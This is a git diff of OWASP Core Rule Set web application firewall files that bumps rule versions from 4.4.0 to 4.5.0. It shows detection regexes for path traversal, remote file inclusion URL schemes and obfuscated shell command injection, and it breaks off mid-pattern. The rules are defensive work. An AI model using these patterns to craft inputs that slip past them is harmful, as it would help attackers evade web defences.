-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
 SecRule ARGS_NAMES "@rx \[" \
 "id:921220,\
 phase:2,\
@@ -321,7 +321,7 @@ SecRule ARGS_NAMES "@rx \[" \
 tag:'paranoia-level/4',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/137/15/460',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
diff --git a/rules/@owasp_crs/REQUEST-922-MULTIPART-ATTACK.conf b/rules/@owasp_crs/REQUEST-922-MULTIPART-ATTACK.conf
index b64f801..b55a83b 100644
--- a/rules/@owasp_crs/REQUEST-922-MULTIPART-ATTACK.conf
+++ b/rules/@owasp_crs/REQUEST-922-MULTIPART-ATTACK.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.4.0
+# OWASP CRS ver.4.5.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
@@ -21,7 +21,7 @@ SecRule &MULTIPART_PART_HEADERS:_charset_ "!@eq 0" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.922100_charset=|%{ARGS._charset_}|',\ chain" @@ -43,7 +43,7 @@ SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*:\s*(.*)$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/272/220',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ chain" SecRule TX:1 "!@rx ^(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\x0b]*;[\s\x0b]*(?:charset[\s\x0b]*=[\s\x0b]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\x0b-\"\(\),/:-\?\[-\]c\{\}]|c(?:[^!\"\(\),/:-\?\[-\]h\{\}]|h(?:[^!\"\(\),/:-\?\[-\]a\{\}]|a(?:[^!\"\(\),/:-\?\[-\]r\{\}]|r(?:[^!\"\(\),/:-\?\[-\]s\{\}]|s(?:[^!\"\(\),/:-\?\[-\]e\{\}]|e[^!\"\(\),/:-\?\[-\]t\{\}]))))))[^!\"\(\),/:-\?\[-\]\{\}]*[\s\x0b]*=[\s\x0b]*[^!\(\),/:-\?\[-\]\{\}]+);?)*(?:[\s\x0b]*,[\s\x0b]*(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\x0b]*;[\s\x0b]*(?:charset[\s\x0b]*=[\s\x0b]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\x0b-\"\(\),/:-\?\[-\]c\{\}]|c(?:[^!\"\(\),/:-\?\[-\]h\{\}]|h(?:[^!\"\(\),/:-\?\[-\]a\{\}]|a(?:[^!\"\(\),/:-\?\[-\]r\{\}]|r(?:[^!\"\(\),/:-\?\[-\]s\{\}]|s(?:[^!\"\(\),/:-\?\[-\]e\{\}]|e[^!\"\(\),/:-\?\[-\]t\{\}]))))))[^!\"\(\),/:-\?\[-\]\{\}]*[\s\x0b]*=[\s\x0b]*[^!\(\),/:-\?\[-\]\{\}]+);?)*)*$" \ @@ -63,6 +63,6 @@ SecRule MULTIPART_PART_HEADERS "@rx content-transfer-encoding:(.*)" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/272/220',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" diff --git a/rules/@owasp_crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/rules/@owasp_crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf index 14f3344..acc539a 100644 
--- a/rules/@owasp_crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf +++ b/rules/@owasp_crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "@rx (?i)(?:[/\x5c]|%(?:2(?:f|5(?:2f|5c|c(?:1%259c|0%25af))|%46)|5c|c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|(?:bg%q|(?:e|f(?:8%8)?0%8)0%80%a)f|u(?:221[56]|EFC8|F025|002f)|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|1u)|0x(?:2f|5c))(?:\.(?:%0[01]|\?)?|\?\.?|%(?:2(?:(?:5(?:2|c0%25a))?e|%45)|c0(?:\.|%[256aef]e)|u(?:(?:ff0|002)e|2024)|%32(?:%(?:%6|4)5|E)|(?:e|f(?:(?:8|c%80)%8)?0%8)0%80%ae)|0x2e){2,3}(?:[/\x5c]|%(?:2(?:f|5(?:2f|5c|c(?:1%259c|0%25af))|%46)|5c|c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|(?:bg%q|(?:e|f(?:8%8)?0%8)0%80%a)f|u(?:221[56]|EFC8|F025|002f)|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|1u)|0x(?:2f|5c))" \ "id:930100,\ phase:2,\ 
@@ -24,7 +24,7 @@ SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/255/153/126',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'"
@@ -43,7 +43,7 @@ SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/255/153/126',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 multiMatch,\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
@@ -64,7 +64,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/255/153/126',\
 tag:'PCI/6.5.4',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -84,12 +84,12 @@ SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \
 tag:'OWASP_CRS',\
 tag:'capec/1000/255/153/126',\
 tag:'PCI/6.5.4',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
 SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@pmFromFile lfi-os-files.data" \
 "id:930121,\
 phase:1,\
@@ -106,12 +106,12 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@pmFromFile lfi-os-f
 tag:'OWASP_CRS',\
 tag:'capec/1000/255/153/126',\
 tag:'PCI/6.5.4',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
 SecMarker "END-REQUEST-930-APPLICATION-ATTACK-LFI"
diff --git a/rules/@owasp_crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/rules/@owasp_crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf
index 3c16760..8d4c864 100644
--- a/rules/@owasp_crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf
+++ b/rules/@owasp_crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.4.0
+# OWASP CRS ver.4.5.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
@@ -7,8 +7,8 @@
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
 SecRule ARGS "@rx ^(?i:file|ftps?|https?)://(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \
 "id:931100,\
 phase:2,\
@@ -24,7 +24,7 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?)://(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/175/253',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -43,7 +43,7 @@ SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_abso
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/175/253',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -62,12 +62,12 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" SecRule ARGS "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[^@]+@)?([^/]*)" \ "id:931130,\ phase:2,\ 
@@ -83,7 +83,7 @@ SecRule ARGS "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|it
 tag:'paranoia-level/2',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/175/253',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\
 chain"
@@ -105,15 +105,15 @@ SecRule REQUEST_FILENAME "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b
 tag:'paranoia-level/2',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/175/253',\
- ver:'OWASP_CRS/4.4.0',\
+ ver:'OWASP_CRS/4.5.0',\
 severity:'CRITICAL',\
 setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\
 chain"
 SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \
 "setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
 SecMarker "END-REQUEST-931-APPLICATION-ATTACK-RFI"
diff --git a/rules/@owasp_crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/rules/@owasp_crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf
index b0ed972..54ecf3c 100644
--- a/rules/@owasp_crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf
+++ b/rules/@owasp_crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.4.0
+# OWASP CRS ver.4.5.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
@@ -7,9 +7,9 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&
&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|(?:(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|x)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\
